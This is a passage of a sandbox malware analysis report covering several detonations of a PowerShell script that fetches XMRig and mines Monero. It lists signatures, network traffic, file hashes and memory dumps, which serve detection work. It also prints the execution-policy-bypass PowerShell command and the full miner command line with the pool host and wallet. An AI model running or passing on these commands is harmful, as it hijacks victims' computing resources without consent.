memory/2120-114-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-115-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-116-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-117-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-118-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:13
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3080 wrote to memory of 1036 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3080 wrote to memory of 1036 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.189.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/3080-3-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
memory/3080-5-0x0000025580590000-0x00000255805B2000-memory.dmp
memory/3080-6-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-9-0x0000025580740000-0x00000255807B6000-memory.dmp
memory/3080-10-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3i5pvc3.s22.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3080-25-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-48-0x00000255807C0000-0x00000255807D2000-memory.dmp
memory/3080-61-0x0000025580730000-0x000002558073A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1036-90-0x0000025858B00000-0x0000025858B20000-memory.dmp
memory/1036-91-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/3080-92-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-94-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
memory/1036-93-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-95-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-96-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-97-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-98-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-99-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-100-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-101-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-102-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-103-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-104-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-105-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-106-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-107-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-108-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-109-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-110-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-111-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-112-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-113-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-114-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-115-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-116-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-117-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-118-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-119-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-120-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-121-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-122-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-123-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-124-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-125-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-126-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-127-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-128-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-129-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-130-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-131-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-132-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-133-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-134-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-135-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-136-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-137-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-138-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-139-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-140-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-141-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-142-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-143-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-144-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-145-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-146-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-147-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-148-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-149-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-150-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-151-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-152-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-153-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-154-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-155-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:21
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4192 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4192 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4192-3-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp
memory/4192-5-0x00000254552F0000-0x0000025455312000-memory.dmp
memory/4192-6-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/4192-9-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/4192-10-0x00000254554A0000-0x0000025455516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izfphklo.5do.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4192-25-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/4192-48-0x0000025455640000-0x0000025455652000-memory.dmp
memory/4192-61-0x0000025455420000-0x000002545542A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2484-90-0x00000211B6B00000-0x00000211B6B20000-memory.dmp
memory/2484-91-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/4192-92-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/4192-94-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp
memory/2484-93-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/4192-95-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/2484-96-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-97-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-98-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-99-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-100-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-101-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-102-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-103-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-104-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-105-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-106-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-107-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-108-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-109-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-110-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-111-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-112-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-113-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-114-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-115-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-116-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-117-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-118-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-119-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-120-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-121-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-122-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-123-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-124-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-125-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-126-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-127-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-128-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-129-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-130-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-131-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-132-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-133-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-134-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-135-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-136-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-137-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-138-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-139-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-140-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-141-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-142-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-143-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-144-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-145-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-146-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-147-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-148-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-149-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-150-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-151-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-152-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-153-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-154-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-155-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-156-0x00007FF630610000-0x00007FF631243000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:23
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2160 wrote to memory of 456 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2160 wrote to memory of 456 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | | tcp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aa3gmuxp.ncv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral20
Detonation Overview
| Submitted | 2024-07-04 03:15 |
| Reported | 2024-07-04 09:35 |
| Platform | win11-20240508-en |
| Max time kernel | 1799s |
| Max time network | 1796s |
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1400 wrote to memory of 1252 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2e3c334.mof.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
